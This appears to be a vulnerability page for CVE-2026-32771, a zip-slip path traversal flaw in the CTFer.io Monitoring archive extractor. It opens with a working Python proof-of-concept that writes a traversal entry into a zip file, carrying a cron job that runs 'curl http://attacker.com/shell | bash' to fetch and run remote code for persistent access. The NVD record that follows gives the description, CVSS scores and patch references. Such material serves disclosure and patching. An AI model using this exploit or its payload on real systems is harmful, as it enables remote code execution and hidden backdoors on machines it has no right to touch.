CVE-2026-32771

import zipfile import os def create_malicious_zip(): # Payload content to be written (e.g., a cron job for reverse shell) # This payload attempts to add a cron job for persistent access payload_content = b"*/1 * * * * /bin/bash -c 'curl http://attacker.com/shell | bash'\n" # The vulnerability allows path traversal because the check lacks a trailing separator. # If the extraction root is /data/extract, a filename like # /data/extract/../../tmp/cron_pwn passes the HasPrefix check # if the code only checks for "/data/extract" without a trailing slash. zip_filename = "exploit.zip" with zipfile.ZipFile(zip_filename, 'w') as zf: # Use an absolute path or traversal sequence relative to extraction dir # Assuming the vulnerable code handles the prefix check incorrectly zinfo = zipfile.ZipInfo("../../../../tmp/cron_pwn") zinfo.external_attr = 0o644 << 16 # Unix permissions zf.writestr(zinfo, payload_content) print(f"[+] Created malicious zip file: {zip_filename}") print(f"[+] Payload written to: ../../../../tmp/cron_pwn") if __name__ == "__main__": create_malicious_zip()

{"cve": {"id": "CVE-2026-32771", "sourceIdentifier": "[email protected]", "published": "2026-03-20T01:15:55.940", "lastModified": "2026-04-16T13:28:34.990", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The CTFer.io Monitoring component is in charge of the collection, process and storage of various signals (i.e. logs, metrics and distributed traces). In versions prior to 0.2.2, the sanitizeArchivePath function in pkg/extract/extract.go (lines 248–254) is vulnerable to Path Traversal due to a missing trailing path separator in the strings.HasPrefix check. The extractor allows arbitrary file writes (e.g., overwriting shell configs, SSH keys, kubeconfig, or crontabs), enabling RCE and persistent backdoors. The attack surface is further amplified by the default ReadWriteMany PVC access mode, which lets any pod in the cluster inject a malicious payload. This issue has been fixed in version 0.2.2."}, {"lang": "es", "value": "El componente de monitoreo de CTFer.io se encarga de la recolección, procesamiento y almacenamiento de varias señales (es decir, registros, métricas y trazas distribuidas). En versiones anteriores a la 0.2.2, la función sanitizeArchivePath en pkg/extract/extract.go (líneas 248–254) es vulnerable a salto de ruta debido a la falta de un separador de ruta final en la verificación strings.HasPrefix. El extractor permite escrituras de archivos arbitrarias (por ejemplo, sobrescribir configuraciones de shell, claves SSH, kubeconfig o crontabs), lo que permite RCE y puertas traseras persistentes. La superficie de ataque se amplifica aún más por el modo de acceso predeterminado ReadWriteMany de PVC, que permite a cualquier pod en el clúster inyectar una carga útil maliciosa. Este problema ha sido solucionado en la versión 0.2.2."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "LOW", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ctfer:monitoring:*:*:*:*:*:go:*:*", "versionEndExcluding": "0.2.2", "matchCriteriaId": "69EE5432-4A5D-4B8F-8D6F-9A5111DFD7B8"}]}]}], "references": [{"url": "https://github.com/ctfer-io/monitoring/commit/269dba165aa42210352628c0db6756f3b8fd3c8a", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/ctfer-io/monitoring/security/advisories/GHSA-f7cq-gvh6-qr25", "source": "[email protected]", "tags": ["Exploit", "Vendor Advisory"]}, {"url": "https://security.snyk.io/research/zip-slip-vulnerability#expandable-socPI9fFAJ-title", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}